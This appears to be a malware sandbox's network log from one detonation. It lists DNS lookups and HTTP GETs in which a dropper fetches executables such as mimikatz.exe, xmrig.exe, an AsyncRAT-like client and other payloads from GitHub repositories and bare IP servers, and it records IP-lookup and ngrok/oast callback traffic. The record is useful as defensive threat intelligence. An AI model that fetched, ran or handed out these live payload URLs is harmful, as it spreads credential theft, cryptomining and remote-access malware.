prod.classify-client.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.classify-client.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

ciscobinary.openh264.org

firefox.exe

Remote address:

8.8.8.8:53

Request

ciscobinary.openh264.org

IN A

Response

ciscobinary.openh264.org

IN CNAME

a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com

a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com

IN CNAME

a17.rackcdn.com

a17.rackcdn.com

IN CNAME

a17.rackcdn.com.mdc.edgesuite.net

a17.rackcdn.com.mdc.edgesuite.net

IN CNAME

a19.dscg10.akamai.net

a19.dscg10.akamai.net

IN A

88.221.134.209

a19.dscg10.akamai.net

IN A

88.221.134.155
DNS

a19.dscg10.akamai.net

firefox.exe

Remote address:

8.8.8.8:53

Request

a19.dscg10.akamai.net

IN A

Response

a19.dscg10.akamai.net

IN A

88.221.134.155

a19.dscg10.akamai.net

IN A

88.221.134.209
DNS

a19.dscg10.akamai.net

firefox.exe

Remote address:

8.8.8.8:53

Request

a19.dscg10.akamai.net

IN A

Response

a19.dscg10.akamai.net

IN A

88.221.134.209

a19.dscg10.akamai.net

IN A

88.221.134.155
DNS

prod.balrog.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.balrog.prod.cloudops.mozgcp.net

IN AAAA

Response
DNS

redirector.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

redirector.gvt1.com

IN A

Response

redirector.gvt1.com

IN A

142.250.180.14
DNS

redirector.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

redirector.gvt1.com

IN A

Response

redirector.gvt1.com

IN A

142.250.180.14
DNS

redirector.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

redirector.gvt1.com

IN A

Response

redirector.gvt1.com

IN A

142.250.180.14
DNS

216.72.190.35.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

216.72.190.35.in-addr.arpa

IN PTR

Response

216.72.190.35.in-addr.arpa

IN PTR

2167219035bcgoogleusercontentcom
DNS

redirector.gvt1.com

NetworkService

Remote address:

8.8.8.8:53

Request

redirector.gvt1.com

IN AAAA

Response

redirector.gvt1.com

IN AAAA

2a00:1450:4009:81e::200e
DNS

r2.sn-5hnednss.gvt1.com

NetworkService

Remote address:

8.8.8.8:53

Request

r2.sn-5hnednss.gvt1.com

IN A

Response

r2.sn-5hnednss.gvt1.com

IN A

172.217.132.199
DNS

r2.sn-5hnednss.gvt1.com

NetworkService

Remote address:

8.8.8.8:53

Request

r2.sn-5hnednss.gvt1.com

IN A

Response

r2.sn-5hnednss.gvt1.com

IN A

172.217.132.199
DNS

201.181.244.35.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

201.181.244.35.in-addr.arpa

IN PTR

Response

201.181.244.35.in-addr.arpa

IN PTR

20118124435bcgoogleusercontentcom
DNS

a19.dscg10.akamai.net

NetworkService

Remote address:

8.8.8.8:53

Request

a19.dscg10.akamai.net

IN AAAA

Response

a19.dscg10.akamai.net

IN AAAA

2a02:26f0:a1::58dd:869b

a19.dscg10.akamai.net

IN AAAA

2a02:26f0:a1::58dd:86d1
DNS

r2---sn-5hnednss.gvt1.com

NetworkService

Remote address:

8.8.8.8:53

Request

r2---sn-5hnednss.gvt1.com

IN A

Response

r2---sn-5hnednss.gvt1.com

IN CNAME

r2.sn-5hnednss.gvt1.com

r2.sn-5hnednss.gvt1.com

IN A

172.217.132.199
DNS

r2.sn-5hnednss.gvt1.com

NetworkService

Remote address:

8.8.8.8:53

Request

r2.sn-5hnednss.gvt1.com

IN AAAA

Response

r2.sn-5hnednss.gvt1.com

IN AAAA

2a00:1450:400e:1b::7
DNS

r2.sn-5hnednss.gvt1.com

NetworkService

Remote address:

8.8.8.8:53

Request

r2.sn-5hnednss.gvt1.com

IN AAAA

Response

r2.sn-5hnednss.gvt1.com

IN AAAA

2a00:1450:400e:1b::7
GET

http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip

firefox.exe

Remote address:

88.221.134.209:80

Request

GET /openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip HTTP/1.1
Host: ciscobinary.openh264.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

Response

HTTP/1.1 200 OK

Last-Modified: Fri, 08 Nov 2024 02:37:54 GMT
ETag: 09372174e83dbbf696ee732fd2e875bb
Content-Length: 491284
Accept-Ranges: bytes
X-Timestamp: 1731033473.13891
Content-Type: application/zip
X-Trans-Id: txe2d6fd5524464f55a6fac-00673047f0dfw1
Cache-Control: public, max-age=218315
Expires: Thu, 16 Jan 2025 06:43:48 GMT
Date: Mon, 13 Jan 2025 18:05:13 GMT
Connection: keep-alive
GET

https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip

firefox.exe

Remote address:

142.250.180.14:443

Request

GET /edgedl/widevine-cdm/4.10.2710.0-win-x64.zip HTTP/2.0
host: redirector.gvt1.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
te: trailers
GET

https://r2---sn-5hnednss.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1736791513,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-5hnednss&ms=nvh&mt=1736790718&mv=u&mvi=2&pl=25&rmhost=r3---sn-5hnednss.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-5hnekn7d.gvt1.com

firefox.exe

Remote address:

172.217.132.199:443

Request

GET /edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1736791513,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-5hnednss&ms=nvh&mt=1736790718&mv=u&mvi=2&pl=25&rmhost=r3---sn-5hnednss.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-5hnekn7d.gvt1.com HTTP/1.1
Host: r2---sn-5hnednss.gvt1.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Cache-Control: public,max-age=86400
Content-Disposition: attachment
Content-Length: 14485862
Content-Security-Policy: default-src 'none'
Content-Type: application/zip
Etag: "1d3918c"
Server: downloads
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 0
Date: Mon, 13 Jan 2025 17:59:53 GMT
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Last-Modified: Thu, 05 Oct 2023 00:56:47 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,quic=":443"; ma=2592000; v="46"
Vary: Origin
DNS

209.134.221.88.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

209.134.221.88.in-addr.arpa

IN PTR

Response

209.134.221.88.in-addr.arpa

IN PTR

a88-221-134-209deploystaticakamaitechnologiescom
DNS

115.34.106.151.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

115.34.106.151.in-addr.arpa

IN PTR

Response

115.34.106.151.in-addr.arpa

IN PTR

ns3158781 ip-151-106-34eu
DNS

128.161.97.34.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

128.161.97.34.in-addr.arpa

IN PTR

Response

128.161.97.34.in-addr.arpa

IN PTR

1281619734bcgoogleusercontentcom
DNS

0.tcp.in.ngrok.io

NetworkService

Remote address:

8.8.8.8:53

Request

0.tcp.in.ngrok.io

IN A

Response

0.tcp.in.ngrok.io

IN A

13.202.226.61
DNS

0.tcp.in.ngrok.io

NetworkService

Remote address:

8.8.8.8:53

Request

0.tcp.in.ngrok.io

IN A

Response

0.tcp.in.ngrok.io

IN A

13.127.206.16
DNS

199.132.217.172.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

199.132.217.172.in-addr.arpa

IN PTR

Response

199.132.217.172.in-addr.arpa

IN PTR

ams16s33-in-f71e100net
DNS

e2c4.gcp.gvt2.com

NetworkService

Remote address:

8.8.8.8:53

Request

e2c4.gcp.gvt2.com

IN A

Response

e2c4.gcp.gvt2.com

IN A

34.97.161.128
DNS

0.tcp.in.ngrok.io

NetworkService

Remote address:

8.8.8.8:53

Request

0.tcp.in.ngrok.io

IN A

Response

0.tcp.in.ngrok.io

IN A

13.127.206.16
DNS

urlhaus.abuse.ch

NetworkService

Remote address:

8.8.8.8:53

Request

urlhaus.abuse.ch

IN A

Response

urlhaus.abuse.ch

IN CNAME

p2.shared.global.fastly.net

p2.shared.global.fastly.net

IN A

151.101.130.49

p2.shared.global.fastly.net

IN A

151.101.2.49

p2.shared.global.fastly.net

IN A

151.101.66.49

p2.shared.global.fastly.net

IN A

151.101.194.49
DNS

41.117.36.101.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

41.117.36.101.in-addr.arpa

IN PTR

Response
DNS

15.142.90.47.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

15.142.90.47.in-addr.arpa

IN PTR

Response
DNS

15.142.90.47.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

15.142.90.47.in-addr.arpa

IN PTR

Response
GET

https://raw.githubusercontent.com/AnshuOp0001/aaaaaaa/refs/heads/main/Client.exe

._cache_New Text Document mod.exe

Remote address:

185.199.111.133:443

Request

GET /AnshuOp0001/aaaaaaa/refs/heads/main/Client.exe HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 46080
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "807153fe4585c6dcb9b82a28f24d6c8f49dd2814ee533fbb6426f6c306469162"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: E061:60888:5C65AD:7B8674:67854251
Accept-Ranges: bytes
Date: Mon, 13 Jan 2025 18:05:18 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600069-LCY
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1736791518.923171,VS0,VE81
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: c8aeac8ce03732da25ddc2f1605a57912247c2d2
Expires: Mon, 13 Jan 2025 18:10:18 GMT
Source-Age: 0
GET

https://raw.githubusercontent.com/Sichostexe/LoxFiles/refs/heads/main/Fixer.exe

._cache_New Text Document mod.exe

Remote address:

185.199.111.133:443

Request

GET /Sichostexe/LoxFiles/refs/heads/main/Fixer.exe HTTP/1.1
Host: raw.githubusercontent.com

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 307712
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "bc06e7eb91e40b6fd1d3e710553bc1cfbe6216bcd59b22a8a502768ee386899f"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 25FF:315BB0:5F1296:7E7FDD:67854F5F
Accept-Ranges: bytes
Date: Mon, 13 Jan 2025 18:05:47 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600069-LCY
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1736791547.320970,VS0,VE81
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: a1adbb3ab08796e31215b8537401f723db817abe
Expires: Mon, 13 Jan 2025 18:10:47 GMT
Source-Age: 0
GET

https://raw.githubusercontent.com/M4HVH2/dwadwa/refs/heads/main/Client-built.exe

._cache_New Text Document mod.exe

Remote address:

185.199.111.133:443

Request

GET /M4HVH2/dwadwa/refs/heads/main/Client-built.exe HTTP/1.1
Host: raw.githubusercontent.com

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 356352
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "6f3618c6644adcacb37743ebe97c4064f339f964f5d9f5e24bdfaa4913bdc695"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 3369:37F6DF:602C8D:7FAF96:67854F60
Accept-Ranges: bytes
Date: Mon, 13 Jan 2025 18:05:47 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600069-LCY
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1736791548.546977,VS0,VE134
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 4265b7c34bc952b34b8157dd1086a169047c6500
Expires: Mon, 13 Jan 2025 18:10:47 GMT
Source-Age: 0
GET

https://raw.githubusercontent.com/ymykaliymy/ymy/refs/heads/main/sela.exe

._cache_New Text Document mod.exe

Remote address:

185.199.111.133:443

Request

GET /ymykaliymy/ymy/refs/heads/main/sela.exe HTTP/1.1
Host: raw.githubusercontent.com

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 44032
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "98d6a26469197910540c5e0b8477fd3e6c09f867bcbdd45b534e7facb1627b17"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: EBF6:68CB1:584851:77682F:67854288
Accept-Ranges: bytes
Date: Mon, 13 Jan 2025 18:06:56 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600069-LCY
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1736791616.193899,VS0,VE153
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 818e35c004da573d4351cd7d1ef0865d260c2d13
Expires: Mon, 13 Jan 2025 18:11:56 GMT
Source-Age: 0
GET

https://raw.githubusercontent.com/TOP-executors/JJsploit/refs/heads/main/JJSPLOIT.V2.exe

._cache_New Text Document mod.exe

Remote address:

185.199.111.133:443

Request

GET /TOP-executors/JJsploit/refs/heads/main/JJSPLOIT.V2.exe HTTP/1.1
Host: raw.githubusercontent.com

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 3266048
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "2b7deb1c102623175d50777d4a6907b3388f10d4edfa0d91674da17df2b54b7a"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 74A4:1F7FE7:5C1A90:7B89C5:67854F92
Accept-Ranges: bytes
Date: Mon, 13 Jan 2025 18:07:18 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600069-LCY
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1736791639.830212,VS0,VE146
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: d22661f96c5cfa8aed3f6f1410b59bd4d9731167
Expires: Mon, 13 Jan 2025 18:12:18 GMT
Source-Age: 0
GET

http://151.106.34.115:6573/svhost.exe

._cache_New Text Document mod.exe

Remote address:

151.106.34.115:6573

Request

GET /svhost.exe HTTP/1.1
Host: 151.106.34.115:6573
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 18:05:18 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/8.2.20
Last-Modified: Fri, 25 Oct 2024 04:38:04 GMT
ETag: "6af800-62545af488300"
Accept-Ranges: bytes
Content-Length: 7010304
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
POST

https://e2c4.gcp.gvt2.com/nel/

chrome.exe

Remote address:

34.97.161.128:443

Request

POST /nel/ HTTP/2.0
host: e2c4.gcp.gvt2.com
content-length: 1456
content-type: application/json; charset=utf-8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 204

date: Mon, 13 Jan 2025 18:05:28 GMT
GET

http://101.36.117.41:8081/02.08.2022.exe

Remote address:

101.36.117.41:8081

Request

GET /02.08.2022.exe HTTP/1.1
Host: 101.36.117.41:8081
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 18:05:42 GMT
Content-Type: application/octet-stream
Content-Length: 211016
GET

http://87.121.86.2:8080/mimikatz.exe

Remote address:

87.121.86.2:8080

Request

GET /mimikatz.exe HTTP/1.1
Host: 87.121.86.2:8080
Connection: Keep-Alive

Response

HTTP/1.0 200 OK

Server: SimpleHTTP/0.6 Python/3.8.10
Date: Mon, 13 Jan 2025 18:05:42 GMT
Content-type: application/x-msdos-program
Content-Length: 1355264
Last-Modified: Mon, 19 Sep 2022 15:44:39 GMT
DNS

2.86.121.87.in-addr.arpa

Remote address:

8.8.8.8:53

Request

2.86.121.87.in-addr.arpa

IN PTR

Response
DNS

32.168.58.82.in-addr.arpa

Remote address:

8.8.8.8:53

Request

32.168.58.82.in-addr.arpa

IN PTR

Response

32.168.58.82.in-addr.arpa

IN PTR

host-82-58-168-32retail telecomitaliait
DNS

32.168.58.82.in-addr.arpa

Remote address:

8.8.8.8:53

Request

32.168.58.82.in-addr.arpa

IN PTR

Response

32.168.58.82.in-addr.arpa

IN PTR

host-82-58-168-32retail telecomitaliait
GET

http://47.90.142.15:2333/123.exe

Remote address:

47.90.142.15:2333

Request

GET /123.exe HTTP/1.1
Host: 47.90.142.15:2333
Connection: Keep-Alive

Response

HTTP/1.0 200 OK

Server: SimpleHTTP/0.6 Python/3.10.12
Date: Mon, 13 Jan 2025 18:05:43 GMT
Content-type: application/x-msdos-program
Content-Length: 73802
Last-Modified: Sun, 15 Dec 2024 16:33:11 GMT
GET

http://82.58.168.32/xmrig.exe

Remote address:

82.58.168.32:80

Request

GET /xmrig.exe HTTP/1.1
Host: 82.58.168.32
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 18:05:43 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
Last-Modified: Thu, 28 Nov 2024 06:11:00 GMT
ETag: "90ee00-627f2f2482eed"
Accept-Ranges: bytes
Content-Length: 9498112
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
GET

http://23.27.51.244/chrtrome22.exe

Remote address:

23.27.51.244:80

Request

GET /chrtrome22.exe HTTP/1.1
Host: 23.27.51.244
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 18:05:46 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sun, 05 Jan 2025 18:06:51 GMT
ETag: "3400-62af96050fbc7"
Accept-Ranges: bytes
Content-Length: 13312
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

244.51.27.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

244.51.27.23.in-addr.arpa

IN PTR

Response
DNS

github.com

Remote address:

8.8.8.8:53

Request

github.com

IN A

Response

github.com

IN A

20.26.156.215
DNS

objects.githubusercontent.com

Remote address:

8.8.8.8:53

Request

objects.githubusercontent.com

IN A

Response

objects.githubusercontent.com

IN A

185.199.110.133

objects.githubusercontent.com

IN A

185.199.108.133

objects.githubusercontent.com

IN A

185.199.111.133

objects.githubusercontent.com

IN A

185.199.109.133
DNS

215.156.26.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

215.156.26.20.in-addr.arpa

IN PTR

Response
DNS

evilbit.pro

Remote address:

8.8.8.8:53

Request

evilbit.pro

IN A

Response

evilbit.pro

IN A

104.21.95.99

evilbit.pro

IN A

172.67.144.26
DNS

evilbit.pro

Remote address:

8.8.8.8:53

Request

evilbit.pro

IN A

Response

evilbit.pro

IN A

172.67.144.26

evilbit.pro

IN A

104.21.95.99
DNS

133.110.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.110.199.185.in-addr.arpa

IN PTR

Response

133.110.199.185.in-addr.arpa

IN PTR

cdn-185-199-110-133githubcom
DNS

99.95.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

99.95.21.104.in-addr.arpa

IN PTR

Response
DNS

lh3.googleusercontent.com

Remote address:

8.8.8.8:53

Request

lh3.googleusercontent.com

IN A

Response

lh3.googleusercontent.com

IN CNAME

googlehosted.l.googleusercontent.com

googlehosted.l.googleusercontent.com

IN A

142.250.200.33
DNS

77.41.56.212.in-addr.arpa

Remote address:

8.8.8.8:53

Request

77.41.56.212.in-addr.arpa

IN PTR

Response

77.41.56.212.in-addr.arpa

IN PTR

vmi2374020 contaboservernet
DNS

www.gstatic.com

Remote address:

8.8.8.8:53

Request

www.gstatic.com

IN A

Response

www.gstatic.com

IN A

142.250.187.227
DNS

www.gstatic.com

Remote address:

8.8.8.8:53

Request

www.gstatic.com

IN A

Response

www.gstatic.com

IN A

142.250.187.227
GET

http://195.177.92.88/build.exe

Remote address:

195.177.92.88:80

Request

GET /build.exe HTTP/1.1
Host: 195.177.92.88
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Type: application/octet-stream
Last-Modified: Mon, 13 Jan 2025 03:26:17 GMT
Accept-Ranges: bytes
ETag: "a0ea9e86a65db1:0"
Server: Microsoft-IIS/10.0
Date: Mon, 13 Jan 2025 18:05:51 GMT
Content-Length: 307712
GET

http://github.com/thomson101/XHP/releases/download/Release/Steanings.exe

Remote address:

20.26.156.215:80

Request

GET /thomson101/XHP/releases/download/Release/Steanings.exe HTTP/1.1
Host: github.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Content-Length: 0
Location: https://github.com/thomson101/XHP/releases/download/Release/Steanings.exe
GET

http://66.63.187.250/zmk/gem2.exe

Remote address:

66.63.187.250:80

Request

GET /zmk/gem2.exe HTTP/1.1
Host: 66.63.187.250
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 18:06:13 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Thu, 09 Jan 2025 17:31:21 GMT
ETag: "2be400-62b4958b77c51"
Accept-Ranges: bytes
Content-Length: 2876416
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
GET

http://66.63.187.250/zmk/gem1.exe

Remote address:

66.63.187.250:80

Request

GET /zmk/gem1.exe HTTP/1.1
Host: 66.63.187.250

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 18:06:16 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Thu, 09 Jan 2025 17:20:31 GMT
ETag: "128e00-62b493200aa71"
Accept-Ranges: bytes
Content-Length: 1216000
Content-Type: application/x-msdownload
DNS

api.ipify.org

gem1.exe

Remote address:

8.8.8.8:53

Request

api.ipify.org

IN A

Response

api.ipify.org

IN A

104.26.13.205

api.ipify.org

IN A

104.26.12.205

api.ipify.org

IN A

172.67.74.152
DNS

wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun

gem1.exe

Remote address:

8.8.8.8:53

Request

wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun

IN A

Response

wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun

IN A

206.189.156.69
DNS

upload.vina-host.com

gem1.exe

Remote address:

8.8.8.8:53

Request

upload.vina-host.com

IN A

Response

upload.vina-host.com

IN A

125.212.220.95
DNS

95.220.212.125.in-addr.arpa

gem1.exe

Remote address:

8.8.8.8:53

Request

95.220.212.125.in-addr.arpa

IN PTR

Response

95.220.212.125.in-addr.arpa

IN CNAME

95.0-24.220.212.125.in-addr.arpa
DNS

95.220.212.125.in-addr.arpa

gem1.exe

Remote address:

8.8.8.8:53

Request

95.220.212.125.in-addr.arpa

IN PTR

Response

95.220.212.125.in-addr.arpa

IN CNAME

95.0-24.220.212.125.in-addr.arpa
GET

http://github.com/legendary6911331/zakaz8/releases/download/safasf/AsyncClientGK.exe

Remote address:

20.26.156.215:80

Request

GET /legendary6911331/zakaz8/releases/download/safasf/AsyncClientGK.exe HTTP/1.1
Host: github.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Content-Length: 0
Location: https://github.com/legendary6911331/zakaz8/releases/download/safasf/AsyncClientGK.exe
GET

http://wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun/

Request

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-US) WindowsPowerShell/5.1.22000.282
Host: wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Server: oast.fun
X-Interactsh-Version: 1.2.2
Date: Mon, 13 Jan 2025 18:06:33 GMT
Content-Length: 72
DNS

69.156.189.206.in-addr.arpa

Request

69.156.189.206.in-addr.arpa

IN PTR

Response

69.156.189.206.in-addr.arpa

IN PTR

oastfun
DNS

69.156.189.206.in-addr.arpa

Request

69.156.189.206.in-addr.arpa

IN PTR

Response

69.156.189.206.in-addr.arpa

IN PTR

oastfun
DNS

qrpn9be.localto.net

Request

qrpn9be.localto.net

IN A

Response

qrpn9be.localto.net

IN A

185.141.35.21
DNS

qrpn9be.localto.net

Request

qrpn9be.localto.net

IN A

Response

qrpn9be.localto.net

IN A

185.141.35.21
DNS

donate.v2.xmrig.com

Request

donate.v2.xmrig.com

IN A

Response

donate.v2.xmrig.com

IN A

178.128.242.134

donate.v2.xmrig.com

IN A

199.247.27.41
DNS

donate.v2.xmrig.com

Request

donate.v2.xmrig.com

IN A

Response

donate.v2.xmrig.com

IN A

178.128.242.134

donate.v2.xmrig.com

IN A

199.247.27.41
DNS

134.242.128.178.in-addr.arpa

Request

134.242.128.178.in-addr.arpa

IN PTR

Response

134.242.128.178.in-addr.arpa

IN PTR

donatev2
DNS

134.242.128.178.in-addr.arpa

Request

134.242.128.178.in-addr.arpa

IN PTR

Response

134.242.128.178.in-addr.arpa

IN PTR

donatev2
DNS

test.aionclassic.pro

Request

test.aionclassic.pro

IN A

Response

test.aionclassic.pro

IN A

80.72.24.103
DNS

ip-api.com

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
DNS

ip-api.com

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com/json/

Request

GET /json/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 18:06:39 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 291
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
DNS

0.tcp.in.ngrok.io

Request

0.tcp.in.ngrok.io

IN A

Response

0.tcp.in.ngrok.io

IN A

35.154.189.194
DNS

1.112.95.208.in-addr.arpa

Request

1.112.95.208.in-addr.arpa

IN PTR

Response

1.112.95.208.in-addr.arpa

IN PTR

ip-apicom
DNS

1.112.95.208.in-addr.arpa

Request

1.112.95.208.in-addr.arpa

IN PTR

Response

1.112.95.208.in-addr.arpa

IN PTR

ip-apicom
GET

http://45.125.67.168/stelin/Crawl.exe

Request

GET /stelin/Crawl.exe HTTP/1.1
Host: 45.125.67.168
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Mon, 13 Jan 2025 18:06:53 GMT
Content-Type: application/octet-stream
Content-Length: 892416
Last-Modified: Tue, 07 Jan 2025 07:22:06 GMT
Connection: keep-alive
ETag: "677cd61e-d9e00"
Accept-Ranges: bytes
DNS

urlhaus.abuse.ch

Request

urlhaus.abuse.ch

IN A

Response

urlhaus.abuse.ch

IN CNAME

p2.shared.global.fastly.net

p2.shared.global.fastly.net

IN A

151.101.66.49

p2.shared.global.fastly.net

IN A

151.101.2.49

p2.shared.global.fastly.net

IN A

151.101.194.49

p2.shared.global.fastly.net

IN A

151.101.130.49
DNS

168.67.125.45.in-addr.arpa

Request

168.67.125.45.in-addr.arpa

IN PTR

Response

168.67.125.45.in-addr.arpa

IN PTR

slot1ge-recom
DNS

